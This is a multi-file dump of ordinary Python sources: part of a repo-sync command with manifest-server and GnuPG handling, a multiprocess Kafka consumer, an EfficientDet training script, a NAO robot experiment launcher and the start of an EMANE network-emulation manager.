print('error: Cannot remove project "%s": uncommitted changes '
'are present' % project.relpath, file=sys.stderr)
print(' commit changes, then run sync again',
file=sys.stderr)
return -1
else:
print('Deleting obsolete path %s' % project.worktree,
file=sys.stderr)
shutil.rmtree(project.worktree)
# Try deleting parent subdirs if they are empty
project_dir = os.path.dirname(project.worktree)
while project_dir != self.manifest.topdir:
try:
os.rmdir(project_dir)
except OSError:
break
project_dir = os.path.dirname(project_dir)
new_project_paths.sort()
fd = open(file_path, 'w')
try:
fd.write('\n'.join(new_project_paths))
fd.write('\n')
finally:
fd.close()
return 0
def Execute(self, opt, args):
if opt.jobs:
self.jobs = opt.jobs
if self.jobs > 1:
soft_limit, _ = _rlimit_nofile()
self.jobs = min(self.jobs, (soft_limit - 5) / 3)
if opt.network_only and opt.detach_head:
print('error: cannot combine -n and -d', file=sys.stderr)
sys.exit(1)
if opt.network_only and opt.local_only:
print('error: cannot combine -n and -l', file=sys.stderr)
sys.exit(1)
if opt.manifest_name and opt.smart_sync:
print('error: cannot combine -m and -s', file=sys.stderr)
sys.exit(1)
if opt.manifest_name and opt.smart_tag:
print('error: cannot combine -m and -t', file=sys.stderr)
sys.exit(1)
if opt.manifest_server_username or opt.manifest_server_password:
if not (opt.smart_sync or opt.smart_tag):
print('error: -u and -p may only be combined with -s or -t',
file=sys.stderr)
sys.exit(1)
if None in [opt.manifest_server_username, opt.manifest_server_password]:
print('error: both -u and -p must be given', file=sys.stderr)
sys.exit(1)
if opt.manifest_name:
self.manifest.Override(opt.manifest_name)
manifest_name = opt.manifest_name
if opt.smart_sync or opt.smart_tag:
if not self.manifest.manifest_server:
print('error: cannot smart sync: no manifest server defined in '
'manifest', file=sys.stderr)
sys.exit(1)
manifest_server = self.manifest.manifest_server
if not opt.quiet:
print('Using manifest server %s' % manifest_server)
if not '@' in manifest_server:
username = None
password = None
if opt.manifest_server_username and opt.manifest_server_password:
username = opt.manifest_server_username
password = opt.manifest_server_password
else:
try:
info = netrc.netrc()
except IOError:
print('.netrc file does not exist or could not be opened',
file=sys.stderr)
else:
try:
parse_result = urllib.parse.urlparse(manifest_server)
if parse_result.hostname:
username, _account, password = \
info.authenticators(parse_result.hostname)
except TypeError:
# TypeError is raised when the given hostname is not present
# in the .netrc file.
print('No credentials found for %s in .netrc'
% parse_result.hostname, file=sys.stderr)
except netrc.NetrcParseError as e:
print('Error parsing .netrc file: %s' % e, file=sys.stderr)
if (username and password):
manifest_server = manifest_server.replace('://', '://%s:%s@' %
(username, password),
1)
try:
server = xmlrpc.client.Server(manifest_server)
if opt.smart_sync:
p = self.manifest.manifestProject
b = p.GetBranch(p.CurrentBranch)
branch = b.merge
if branch.startswith(R_HEADS):
branch = branch[len(R_HEADS):]
env = os.environ.copy()
if 'TARGET_PRODUCT' in env and 'TARGET_BUILD_VARIANT' in env:
target = '%s-%s' % (env['TARGET_PRODUCT'],
env['TARGET_BUILD_VARIANT'])
[success, manifest_str] = server.GetApprovedManifest(branch, target)
else:
[success, manifest_str] = server.GetApprovedManifest(branch)
else:
assert(opt.smart_tag)
[success, manifest_str] = server.GetManifest(opt.smart_tag)
if success:
manifest_name = "smart_sync_override.xml"
manifest_path = os.path.join(self.manifest.manifestProject.worktree,
manifest_name)
try:
f = open(manifest_path, 'w')
try:
f.write(manifest_str)
finally:
f.close()
except IOError:
print('error: cannot write manifest to %s' % manifest_path,
file=sys.stderr)
sys.exit(1)
self._ReloadManifest(manifest_name)
else:
print('error: manifest server RPC call failed: %s' %
manifest_str, file=sys.stderr)
sys.exit(1)
except (socket.error, IOError, xmlrpc.client.Fault) as e:
print('error: cannot connect to manifest server %s:\n%s'
% (self.manifest.manifest_server, e), file=sys.stderr)
sys.exit(1)
except xmlrpc.client.ProtocolError as e:
print('error: cannot connect to manifest server %s:\n%d %s'
% (self.manifest.manifest_server, e.errcode, e.errmsg),
file=sys.stderr)
sys.exit(1)
rp = self.manifest.repoProject
rp.PreSync()
mp = self.manifest.manifestProject
mp.PreSync()
if opt.repo_upgraded:
_PostRepoUpgrade(self.manifest, quiet=opt.quiet)
if not opt.local_only:
mp.Sync_NetworkHalf(quiet=opt.quiet,
current_branch_only=opt.current_branch_only,
no_tags=opt.no_tags)
if mp.HasChanges:
syncbuf = SyncBuffer(mp.config)
mp.Sync_LocalHalf(syncbuf)
if not syncbuf.Finish():
sys.exit(1)
self._ReloadManifest(manifest_name)
if opt.jobs is None:
self.jobs = self.manifest.default.sync_j
all_projects = self.GetProjects(args,
missing_ok=True,
submodules_ok=opt.fetch_submodules)
self._fetch_times = _FetchTimes(self.manifest)
if not opt.local_only:
to_fetch = []
now = time.time()
if _ONE_DAY_S <= (now - rp.LastFetch):
to_fetch.append(rp)
to_fetch.extend(all_projects)
to_fetch.sort(key=self._fetch_times.Get, reverse=True)
fetched = self._Fetch(to_fetch, opt)
_PostRepoFetch(rp, opt.no_repo_verify)
if opt.network_only:
# bail out now; the rest touches the working tree
return
# Iteratively fetch missing and/or nested unregistered submodules
previously_missing_set = set()
while True:
self._ReloadManifest(manifest_name)
all_projects = self.GetProjects(args,
missing_ok=True,
submodules_ok=opt.fetch_submodules)
missing = []
for project in all_projects:
if project.gitdir not in fetched:
missing.append(project)
if not missing:
break
# Stop us from non-stopped fetching actually-missing repos: If set of
# missing repos has not been changed from last fetch, we break.
missing_set = set(p.name for p in missing)
if previously_missing_set == missing_set:
break
previously_missing_set = missing_set
fetched.update(self._Fetch(missing, opt))
if self.manifest.IsMirror:
# bail out now, we have no working tree
return
if self.UpdateProjectList():
sys.exit(1)
syncbuf = SyncBuffer(mp.config,
detach_head = opt.detach_head)
pm = Progress('Syncing work tree', len(all_projects))
for project in all_projects:
pm.update()
if project.worktree:
project.Sync_LocalHalf(syncbuf)
pm.end()
print(file=sys.stderr)
if not syncbuf.Finish():
sys.exit(1)
# If there's a notice that's supposed to print at the end of the sync, print
# it now...
if self.manifest.notice:
print(self.manifest.notice)
def _PostRepoUpgrade(manifest, quiet=False):
wrapper = WrapperModule()
if wrapper.NeedSetupGnuPG():
wrapper.SetupGnuPG(quiet)
for project in manifest.projects.values():
if project.Exists:
project.PostRepoUpgrade()
def _PostRepoFetch(rp, no_repo_verify=False, verbose=False):
if rp.HasChanges:
print('info: A new version of repo is available', file=sys.stderr)
print(file=sys.stderr)
if no_repo_verify or _VerifyTag(rp):
syncbuf = SyncBuffer(rp.config)
rp.Sync_LocalHalf(syncbuf)
if not syncbuf.Finish():
sys.exit(1)
print('info: Restarting repo with latest version', file=sys.stderr)
raise RepoChangedException(['--repo-upgraded'])
else:
print('warning: Skipped upgrade to unverified version', file=sys.stderr)
else:
if verbose:
print('repo version %s is current' % rp.work_git.describe(HEAD),
file=sys.stderr)
def _VerifyTag(project):
gpg_dir = os.path.expanduser('~/.repoconfig/gnupg')
if not os.path.exists(gpg_dir):
print('warning: GnuPG was not available during last "repo init"\n'
'warning: Cannot automatically authenticate repo."""',
file=sys.stderr)
return True
try:
cur = project.bare_git.describe(project.GetRevisionId())
except GitError:
cur = None
if not cur \
or re.compile(r'^.*-[0-9]{1,}-g[0-9a-f]{1,}$').match(cur):
rev = project.revisionExpr
if rev.startswith(R_HEADS):
rev = rev[len(R_HEADS):]
print(file=sys.stderr)
print("warning: project '%s' branch '%s' is not signed"
% (project.name, rev), file=sys.stderr)
return False
env = os.environ.copy()
env['GIT_DIR'] = project.gitdir.encode()
env['GNUPGHOME'] = gpg_dir.encode()
cmd = [GIT, 'tag', '-v', cur]
proc = subprocess.Popen(cmd,
stdout = subprocess.PIPE,
stderr = subprocess.PIPE,
env = env)
out = proc.stdout.read()
proc.stdout.close()
err = proc.stderr.read()
proc.stderr.close()
if proc.wait() != 0:
print(file=sys.stderr)
print(out, file=sys.stderr)
print(err, file=sys.stderr)
print(file=sys.stderr)
return False
return True
class _FetchTimes(object):
_ALPHA = 0.5
def __init__(self, manifest):
self._path = os.path.join(manifest.repodir, '.repopickle_fetchtimes')
self._times = None
self._seen = set()
def Get(self, project):
self._Load()
return self._times.get(project.name, _ONE_DAY_S)
def Set(self, project, t):
self._Load()
name = project.name
old = self._times.get(name, t)
self._seen.add(name)
a = self._ALPHA
self._times[name] = (a*t) + ((1-a) * old)
def _Load(self):
if self._times is None:
try:
f = open(self._path)
except IOError:
self._times = {}
return self._times
try:
try:
self._times = pickle.load(f)
except IOError:
try:
os.remove(self._path)
except OSError:
pass
self._times = {}
finally:
f.close()
return self._times
def Save(self):
if self._times is None:
return
to_delete = []
for name in self._times:
if name not in self._seen:
to_delete.append(name)
for name in to_delete:
del self._times[name]
try:
f = open(self._path, 'wb')
try:
pickle.dump(self._times, f)
except (IOError, OSError, pickle.PickleError):
try:
os.remove(self._path)
except OSError:
pass
finally:
f.close()
|
mp_consume.py
|
from collections import namedtuple
import logging
import queue
from multiprocessing import Process, Manager as MPManager
from .confluent_python_consumer import _mp_consume as _mp_consume_confluent_kafka
from .kafka_python_consumer import _mp_consume as _mp_consume_kafka_python
Events = namedtuple("Events", ["start", "stop", "exit"])
class MultiProcessConsumer:
def __init__(self, use_confluent_kafka=False, num_procs=1, report_interval=5, json_logging=False, log_level='INFO', verbose=False, **consumer_options):
# Variables for managing and controlling the data flow from
# consumer child process to master
manager = MPManager()
self.queue = manager.Queue(1024) # Child consumers dump messages into this
self.events = Events(
start = manager.Event(), # Indicates the consumers to start fetch
stop = manager.Event(), # Indicates to stop fetching and pushing data till start is set back
exit = manager.Event() # Requests the consumers to shutdown
)
self.report_interval = report_interval
self.num_procs = num_procs
self.consumer_options = consumer_options
self.json_logging = json_logging
self.verbose = verbose
self.log_level = log_level
self.procs = []
for proc in range(self.num_procs):
args = (self.queue, self.report_interval, self.json_logging, self.log_level, self.verbose, self.events)
proc = Process(target=_mp_consume_confluent_kafka if use_confluent_kafka else _mp_consume_kafka_python, args=args, kwargs=consumer_options)
proc.daemon = True
proc.start()
self.procs.append(proc)
def stop(self):
self.events.exit.set()
self.events.stop.set()
self.events.start.set()
for proc in self.procs:
proc.join()
proc.terminate()
def __iter__(self):
# first check if any of the child processes died
for proc in self.procs:
if not proc.is_alive():
raise Exception("Child process with PID %d died with %d exitcode" % (proc.pid, proc.exitcode))
while True:
self.events.stop.clear()
self.events.start.set()
try:
# We will block for a report_interval based time so that the consumers get
# a chance to run and put some messages in the queue
message = self.queue.get(block=True, timeout=self.report_interval*2)
except queue.Empty:
break
yield message
self.events.stop.set()
self.events.start.clear()
|
main.py
|
# Copyright 2020 Google Research. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The main training script."""
import multiprocessing
import os
from absl import app
from absl import flags
from absl import logging
import numpy as np
import tensorflow.compat.v1 as tf
import dataloader
import det_model_fn
import hparams_config
import utils
flags.DEFINE_string(
'tpu',
default=None,
help='The Cloud TPU to use for training. This should be either the name '
'used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 '
'url.')
flags.DEFINE_string(
'gcp_project',
default=None,
help='Project name for the Cloud TPU-enabled project. If not specified, we '
'will attempt to automatically detect the GCE project from metadata.')
flags.DEFINE_string(
'tpu_zone',
default=None,
help='GCE zone where the Cloud TPU is located in. If not specified, we '
'will attempt to automatically detect the GCE project from metadata.')
flags.DEFINE_string('eval_name', default=None, help='Eval job name')
flags.DEFINE_enum('strategy', None, ['tpu', 'gpus', ''],
'Training: gpus for multi-gpu, if None, use TF default.')
flags.DEFINE_bool('use_fake_data', False, 'Use fake input.')
flags.DEFINE_bool(
'use_xla', False,
'Use XLA even if strategy is not tpu. If strategy is tpu, always use XLA, '
'and this flag has no effect.')
flags.DEFINE_string('model_dir', None, 'Location of model_dir')
flags.DEFINE_string(
'backbone_ckpt', '', 'Location of the ResNet50 checkpoint to use for model '
'initialization.')
flags.DEFINE_string('ckpt', None,
'Start training from this EfficientDet checkpoint.')
flags.DEFINE_string(
'hparams', '', 'Comma separated k=v pairs of hyperparameters or a module'
' containing attributes to use as hyperparameters.')
flags.DEFINE_integer(
'num_cores', default=8, help='Number of TPU cores for training')
flags.DEFINE_bool('use_spatial_partition', False, 'Use spatial partition.')
flags.DEFINE_integer(
'num_cores_per_replica',
default=2,
help='Number of TPU cores per replica when using spatial partition.')
flags.DEFINE_multi_integer(
'input_partition_dims', [1, 2, 1, 1],
'A list that describes the partition dims for all the tensors.')
flags.DEFINE_integer('train_batch_size', 64, 'global training batch size')
flags.DEFINE_integer('eval_batch_size', 1, 'global evaluation batch size')
flags.DEFINE_integer('eval_samples', 5000, 'Number of samples for eval.')
flags.DEFINE_integer('iterations_per_loop', 100,
'Number of iterations per TPU training loop')
flags.DEFINE_integer('save_checkpoints_steps', 100,
'Number of iterations per checkpoint save')
flags.DEFINE_string(
'training_file_pattern', None,
'Glob for training data files (e.g., COCO train - minival set)')
flags.DEFINE_string('validation_file_pattern', None,
'Glob for evaluation tfrecords (e.g., COCO val2017 set)')
flags.DEFINE_string(
'val_json_file', None,
'COCO validation JSON containing golden bounding boxes. If None, use the '
'ground truth from the dataloader. Ignored if testdev_dir is not None.')
flags.DEFINE_string('testdev_dir', None,
'COCO testdev dir. If not None, ignorer val_json_file.')
flags.DEFINE_integer('num_examples_per_epoch', 120000,
'Number of examples in one epoch')
flags.DEFINE_integer('num_epochs', None, 'Number of epochs for training')
flags.DEFINE_string('mode', 'train',
'Mode to run: train or eval (default: train)')
flags.DEFINE_string('model_name', 'efficientdet-d1', 'Model name.')
flags.DEFINE_bool('eval_after_training', False, 'Run one eval after the '
'training finishes.')
flags.DEFINE_bool('profile', False, 'Profile training performance.')
flags.DEFINE_integer(
'tf_random_seed', None, 'Sets the TF graph seed for deterministic execution'
' across runs (for debugging).')
# For Eval mode
flags.DEFINE_integer('min_eval_interval', 180,
'Minimum seconds between evaluations.')
flags.DEFINE_integer(
'eval_timeout', None,
'Maximum seconds between checkpoints before evaluation terminates.')
# for train_and_eval mode
flags.DEFINE_bool(
'run_epoch_in_child_process', True,
'This option helps to rectify CPU memory leak. If True, every epoch is '
'run in a separate process for train and eval and memory will be cleared.'
'Drawback: need to kill 2 processes if trainining needs to be interrupted.')
FLAGS = flags.FLAGS
def main(_):
if FLAGS.strategy == 'tpu':
tf.disable_eager_execution()
tpu_cluster_resolver = tf.distribute.cluster_resolver.TPUClusterResolver(
FLAGS.tpu, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)
tpu_grpc_url = tpu_cluster_resolver.get_master()
tf.Session.reset(tpu_grpc_url)
else:
tpu_cluster_resolver = None
# Check data path
if FLAGS.mode in ('train', 'train_and_eval'):
if FLAGS.training_file_pattern is None:
raise RuntimeError('Must specify --training_file_pattern for train.')
if FLAGS.mode in ('eval', 'train_and_eval'):
if FLAGS.validation_file_pattern is None:
raise RuntimeError('Must specify --validation_file_pattern for eval.')
# Parse and override hparams
config = hparams_config.get_detection_config(FLAGS.model_name)
config.override(FLAGS.hparams)
if FLAGS.num_epochs: # NOTE: remove this flag after updating all docs.
config.num_epochs = FLAGS.num_epochs
# Parse image size in case it is in string format.
config.image_size = utils.parse_image_size(config.image_size)
# The following is for spatial partitioning. `features` has one tensor while
# `labels` had 4 + (`max_level` - `min_level` + 1) * 2 tensors. The input
# partition is performed on `features` and all partitionable tensors of
# `labels`, see the partition logic below.
# In the TPUEstimator context, the meaning of `shard` and `replica` is the
# same; follwing the API, here has mixed use of both.
if FLAGS.use_spatial_partition:
# Checks input_partition_dims agrees with num_cores_per_replica.
if FLAGS.num_cores_per_replica != np.prod(FLAGS.input_partition_dims):
raise RuntimeError('--num_cores_per_replica must be a product of array'
'elements in --input_partition_dims.')
labels_partition_dims = {
'mean_num_positives': None,
'source_ids': None,
'groundtruth_data': None,
'image_scales': None,
'image_masks': None,
}
# The Input Partition Logic: We partition only the partition-able tensors.
feat_sizes = utils.get_feat_sizes(
config.get('image_size'), config.get('max_level'))
for level in range(config.get('min_level'), config.get('max_level') + 1):
def _can_partition(spatial_dim):
partitionable_index = np.where(
spatial_dim % np.array(FLAGS.input_partition_dims) == 0)
return len(partitionable_index[0]) == len(FLAGS.input_partition_dims)
spatial_dim = feat_sizes[level]
if _can_partition(spatial_dim['height']) and _can_partition(
spatial_dim['width']):
labels_partition_dims['box_targets_%d' %
level] = FLAGS.input_partition_dims
labels_partition_dims['cls_targets_%d' %
level] = FLAGS.input_partition_dims
else:
labels_partition_dims['box_targets_%d' % level] = None
labels_partition_dims['cls_targets_%d' % level] = None
num_cores_per_replica = FLAGS.num_cores_per_replica
input_partition_dims = [FLAGS.input_partition_dims, labels_partition_dims]
num_shards = FLAGS.num_cores // num_cores_per_replica
else:
num_cores_per_replica = None
input_partition_dims = None
num_shards = FLAGS.num_cores
params = dict(
config.as_dict(),
model_name=FLAGS.model_name,
iterations_per_loop=FLAGS.iterations_per_loop,
model_dir=FLAGS.model_dir,
num_shards=num_shards,
num_examples_per_epoch=FLAGS.num_examples_per_epoch,
strategy=FLAGS.strategy,
backbone_ckpt=FLAGS.backbone_ckpt,
ckpt=FLAGS.ckpt,
val_json_file=FLAGS.val_json_file,
testdev_dir=FLAGS.testdev_dir,
profile=FLAGS.profile,
mode=FLAGS.mode)
config_proto = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False)
if FLAGS.strategy != 'tpu':
if FLAGS.use_xla:
config_proto.graph_options.optimizer_options.global_jit_level = (
tf.OptimizerOptions.ON_1)
config_proto.gpu_options.allow_growth = True
model_dir = FLAGS.model_dir
model_fn_instance = det_model_fn.get_model_fn(FLAGS.model_name)
max_instances_per_image = config.max_instances_per_image
if FLAGS.eval_samples:
eval_steps = int((FLAGS.eval_samples + FLAGS.eval_batch_size - 1) //
FLAGS.eval_batch_size)
else:
eval_steps = None
total_examples = int(config.num_epochs * FLAGS.num_examples_per_epoch)
train_steps = total_examples // FLAGS.train_batch_size
logging.info(params)
if not tf.io.gfile.exists(model_dir):
tf.io.gfile.makedirs(model_dir)
config_file = os.path.join(model_dir, 'config.yaml')
if not tf.io.gfile.exists(config_file):
tf.io.gfile.GFile(config_file, 'w').write(str(config))
train_input_fn = dataloader.InputReader(
FLAGS.training_file_pattern,
is_training=True,
use_fake_data=FLAGS.use_fake_data,
max_instances_per_image=max_instances_per_image)
eval_input_fn = dataloader.InputReader(
FLAGS.validation_file_pattern,
is_training=False,
use_fake_data=FLAGS.use_fake_data,
max_instances_per_image=max_instances_per_image)
if FLAGS.strategy == 'tpu':
tpu_config = tf.estimator.tpu.TPUConfig(
FLAGS.iterations_per_loop if FLAGS.strategy == 'tpu' else 1,
num_cores_per_replica=num_cores_per_replica,
input_partition_dims=input_partition_dims,
per_host_input_for_training=tf.estimator.tpu.InputPipelineConfig
.PER_HOST_V2)
run_config = tf.estimator.tpu.RunConfig(
cluster=tpu_cluster_resolver,
model_dir=model_dir,
log_step_count_steps=FLAGS.iterations_per_loop,
session_config=config_proto,
tpu_config=tpu_config,
save_checkpoints_steps=FLAGS.save_checkpoints_steps,
tf_random_seed=FLAGS.tf_random_seed,
)
# TPUEstimator can do both train and eval.
train_est = tf.estimator.tpu.TPUEstimator(
model_fn=model_fn_instance,
train_batch_size=FLAGS.train_batch_size,
eval_batch_size=FLAGS.eval_batch_size,
config=run_config,
params=params)
eval_est = train_est
else:
strategy = None
if FLAGS.strategy == 'gpus':
strategy = tf.distribute.MirroredStrategy()
run_config = tf.estimator.RunConfig(
model_dir=model_dir,
train_distribute=strategy,
log_step_count_steps=FLAGS.iterations_per_loop,
session_config=config_proto,
save_checkpoints_steps=FLAGS.save_checkpoints_steps,
tf_random_seed=FLAGS.tf_random_seed,
)
def get_estimator(global_batch_size):
params['num_shards'] = getattr(strategy, 'num_replicas_in_sync', 1)
params['batch_size'] = global_batch_size // params['num_shards']
return tf.estimator.Estimator(
model_fn=model_fn_instance, config=run_config, params=params)
# train and eval need different estimator due to different batch size.
train_est = get_estimator(FLAGS.train_batch_size)
eval_est = get_estimator(FLAGS.eval_batch_size)
# start train/eval flow.
if FLAGS.mode == 'train':
train_est.train(input_fn=train_input_fn, max_steps=train_steps)
if FLAGS.eval_after_training:
eval_est.evaluate(input_fn=eval_input_fn, steps=eval_steps)
elif FLAGS.mode == 'eval':
# Run evaluation when there's a new checkpoint
for ckpt in tf.train.checkpoints_iterator(
FLAGS.model_dir,
min_interval_secs=FLAGS.min_eval_interval,
timeout=FLAGS.eval_timeout):
logging.info('Starting to evaluate.')
try:
eval_results = eval_est.evaluate(eval_input_fn, steps=eval_steps)
# Terminate eval job when final checkpoint is reached.
try:
current_step = int(os.path.basename(ckpt).split('-')[1])
except IndexError:
logging.info('%s has no global step info: stop!', ckpt)
break
utils.archive_ckpt(eval_results, eval_results['AP'], ckpt)
if current_step >= train_steps:
logging.info('Eval finished step %d/%d', current_step, train_steps)
break
except tf.errors.NotFoundError:
# Checkpoint might be not already deleted by the time eval finished.
# We simply skip ssuch case.
logging.info('Checkpoint %s no longer exists, skipping.', ckpt)
elif FLAGS.mode == 'train_and_eval':
ckpt = tf.train.latest_checkpoint(FLAGS.model_dir)
try:
step = int(os.path.basename(ckpt).split('-')[1])
current_epoch = (
step * FLAGS.train_batch_size // FLAGS.num_examples_per_epoch)
logging.info('found ckpt at step %d (epoch %d)', step, current_epoch)
except (IndexError, TypeError):
logging.info('Folder %s has no ckpt with valid step.', FLAGS.model_dir)
current_epoch = 0
def run_train_and_eval(e):
print('\n =====> Starting training, epoch: %d.' % e)
train_est.train(
input_fn=train_input_fn,
max_steps=e * FLAGS.num_examples_per_epoch // FLAGS.train_batch_size)
print('\n =====> Starting evaluation, epoch: %d.' % e)
eval_results = eval_est.evaluate(input_fn=eval_input_fn, steps=eval_steps)
ckpt = tf.train.latest_checkpoint(FLAGS.model_dir)
utils.archive_ckpt(eval_results, eval_results['AP'], ckpt)
epochs_per_cycle = 1 # higher number has less graph construction overhead.
for e in range(current_epoch + 1, config.num_epochs + 1, epochs_per_cycle):
if FLAGS.run_epoch_in_child_process:
p = multiprocessing.Process(target=run_train_and_eval, args=(e,))
p.start()
p.join()
if p.exitcode != 0:
return p.exitcode
else:
run_train_and_eval(e)
else:
logging.info('Invalid mode: %s', FLAGS.mode)
if __name__ == '__main__':
app.run(main)
|
main_nao.py
|
import os
import threading
from naoqi import ALProxy
import time
def intro(subject_id):
start_working(subject_id)
time.sleep(60)
def start_working(subject_id):
subject_id = subject_id
def worker1():
os.system('roslaunch skeleton_markers markers.launch')
return
def worker2():
os.system('python curious_game/angle_matrix.py')
return
def worker3():
os.system('python curious_game/nao_ros.py')
return
def worker4():
os.system('rosbag record -a -o data/physical_curiosity_open_day_' + subject_id + '.bag')
def worker5():
os.system('python curious_game/skeleton_angles.py')
def worker6():
os.system('python curious_game/experiment.py '+subject_id)
def worker7():
os.system('python curious_game/nao_camera_ros.py')
def worker8():
os.system('roslaunch multi_camera_affdex multi_camera_affdex.launch')
t1 = threading.Thread(target=worker1)
t1.start()
threading._sleep(0.2)
t2 = threading.Thread(target=worker2)
t2.start()
threading._sleep(0.2)
t3 = threading.Thread(target=worker3)
t3.start()
threading._sleep(0.2)
t5 = threading.Thread(target=worker5)
t5.start()
threading._sleep(0.2)
t6 = threading.Thread(target=worker6)
t6.start()
threading._sleep(0.2)
t7 = threading.Thread(target=worker7)
t7.start()
threading._sleep(0.2)
t8 = threading.Thread(target=worker8)
t8.start()
threading._sleep(0.2)
t4 = threading.Thread(target=worker4)
t4.start()
intro("52")
|
emanemanager.py
|
"""
emane.py: definition of an Emane class for implementing configuration control of an EMANE emulation.
"""
import logging
import os
import threading
from core import CoreCommandError, utils
from core import constants
from core.api.tlv import coreapi, dataconversion
from core.config import ConfigGroup
from core.config import ConfigShim
from core.config import Configuration
from core.config import ModelManager
from core.emane import emanemanifest
from core.emane.bypass import EmaneBypassModel
from core.emane.commeffect import EmaneCommEffectModel
from core.emane.emanemodel import EmaneModel
from core.emane.ieee80211abg import EmaneIeee80211abgModel
from core.emane.rfpipe import EmaneRfPipeModel
from core.emane.tdma import EmaneTdmaModel
from core.emulator.enumerations import ConfigDataTypes
from core.emulator.enumerations import ConfigFlags
from core.emulator.enumerations import ConfigTlvs
from core.emulator.enumerations import MessageFlags
from core.emulator.enumerations import MessageTypes
from core.emulator.enumerations import NodeTypes
from core.emulator.enumerations import RegisterTlvs
from core.nodes import nodeutils
from core.xml import emanexml
try:
from emane.events import EventService
from emane.events import LocationEvent
from emane.events.eventserviceexception import EventServiceException
except ImportError:
try:
from emanesh.events import EventService
from emanesh.events import LocationEvent
from emanesh.events.eventserviceexception import EventServiceException
except ImportError:
logging.debug("compatible emane python bindings not installed")
EMANE_MODELS = [
EmaneRfPipeModel,
EmaneIeee80211abgModel,
EmaneCommEffectModel,
EmaneBypassModel,
EmaneTdmaModel
]
DEFAULT_EMANE_PREFIX = "/usr"
class EmaneManager(ModelManager):
"""
EMANE controller object. Lives in a Session instance and is used for
building EMANE config files from all of the EmaneNode objects in this
emulation, and for controlling the EMANE daemons.
"""
name = "emane"
config_type = RegisterTlvs.EMULATION_SERVER.value
SUCCESS, NOT_NEEDED, NOT_READY = (0, 1, 2)
EVENTCFGVAR = "LIBEMANEEVENTSERVICECONFIG"
DEFAULT_LOG_LEVEL = 3
def __init__(self, session):
"""
Creates a Emane instance.
:param core.session.Session session: session this manager is tied to
:return: nothing
"""
super(EmaneManager, self).__init__()
self.session = session
self._emane_nodes = {}
self._emane_node_lock = threading.Lock()
self._ifccounts = {}
self._ifccountslock = threading.Lock()
# port numbers are allocated from these counters
self.platformport = self.session.options.get_config_int("emane_platform_port", 8100)
self.transformport = self.session.options.get_config_int("emane_transform_port", 8200)
self.doeventloop = False
self.eventmonthread = None
# model for global EMANE configuration options
self.emane_config = EmaneGlobalModel(session)
self.set_configs(self.emane_config.default_values())
session.broker.handlers.add(self.handledistributed)
self.service = None
self.event_device = None
self.emane_check()
def getifcconfig(self, node_id, interface, model_name):
"""
Retrieve interface configuration or node configuration if not provided.
:param int node_id: node id
:param interface: node interface
:param str model_name: model to get configuration for
:return: node/interface model configuration
:rtype: dict
"""
# use the network-wide config values or interface(NEM)-specific values?
if interface is None:
return self.get_configs(node_id=node_id, config_type=model_name)
else:
# don"t use default values when interface config is the same as net
# note here that using ifc.node.id as key allows for only one type
# of each model per node;
# TODO: use both node and interface as key
# Adamson change: first check for iface config keyed by "node:ifc.name"
# (so that nodes w/ multiple interfaces of same conftype can have
# different configs for each separate interface)
key = 1000 * interface.node.id
if interface.netindex is not None:
key += interface.netindex
# try retrieve interface specific configuration, avoid getting defaults
config = self.get_configs(node_id=key, config_type=model_name)
# otherwise retrieve the interfaces node configuration, avoid using defaults
if not config:
config = self.get_configs(node_id=interface.node.id, config_type=model_name)
# get non interface config, when none found
if not config:
# with EMANE 0.9.2+, we need an extra NEM XML from
# model.buildnemxmlfiles(), so defaults are returned here
config = self.get_configs(node_id=node_id, config_type=model_name)
return config
def config_reset(self, node_id=None):
super(EmaneManager, self).config_reset(node_id)
self.set_configs(self.emane_config.default_values())
def emane_check(self):
"""
Check if emane is installed and load models.
:return: nothing
"""
try:
# check for emane
emane_version = utils.check_cmd(["emane", "--version"])
logging.info("using EMANE: %s", emane_version)
# load default emane models
self.load_models(EMANE_MODELS)
# load custom models
custom_models_path = self.session.options.get_config("emane_models_dir")
if custom_models_path:
emane_models = utils.load_classes(custom_models_path, EmaneModel)
self.load_models(emane_models)
except CoreCommandError:
logging.info("emane is not installed")
def deleteeventservice(self):
if self.service:
for fd in self.service._readFd, self.service._writeFd:
if fd >= 0:
os.close(fd)
for f in self.service._socket, self.service._socketOTA:
if f:
f.close()
self.service = None
self.event_device = None
def initeventservice(self, filename=None, shutdown=False):
"""
Re-initialize the EMANE Event service.
The multicast group and/or port may be configured.
"""
self.deleteeventservice()
if shutdown:
return
# Get the control network to be used for events
group, port = self.get_config("eventservicegroup").split(":")
self.event_device = self.get_config("eventservicedevice")
eventnetidx = self.session.get_control_net_index(self.event_device)
if eventnetidx < 0:
logging.error("invalid emane event service device provided: %s", self.event_device)
return False
# make sure the event control network is in place
eventnet = self.session.add_remove_control_net(net_index=eventnetidx, remove=False, conf_required=False)
if eventnet is not None:
# direct EMANE events towards control net bridge
self.event_device = eventnet.brname
eventchannel = (group, int(port), self.event_device)
# disabled otachannel for event service
# only needed for e.g. antennaprofile events xmit by models
logging.info("using %s for event service traffic", self.event_device)
try:
self.service = EventService(eventchannel=eventchannel, otachannel=None)
except EventServiceException:
logging.exception("error instantiating emane EventService")
return True
def load_models(self, emane_models):
"""
Load EMANE models and make them available.
"""
for emane_model in emane_models:
logging.info("loading emane model: %s", emane_model.__name__)
emane_prefix = self.session.options.get_config("emane_prefix", default=DEFAULT_EMANE_PREFIX)
emane_model.load(emane_prefix)
self.models[emane_model.name] = emane_model
def add_node(self, emane_node):
"""
Add a new EmaneNode object to this Emane controller object
:param core.emane.nodes.EmaneNode emane_node: emane node to add
:return: nothing
"""
with self._emane_node_lock:
if emane_node.id in self._emane_nodes:
raise KeyError("non-unique EMANE object id %s for %s" % (emane_node.id, emane_node))
self._emane_nodes[emane_node.id] = emane_node
def getnodes(self):
"""
Return a set of CoreNodes that are linked to an EmaneNode,
e.g. containers having one or more radio interfaces.
"""
# assumes self._objslock already held
nodes = set()
for emane_node in self._emane_nodes.values():
for netif in emane_node.netifs():
nodes.add(netif.node)
return nodes
def setup(self):
"""
Populate self._objs with EmaneNodes; perform distributed setup;
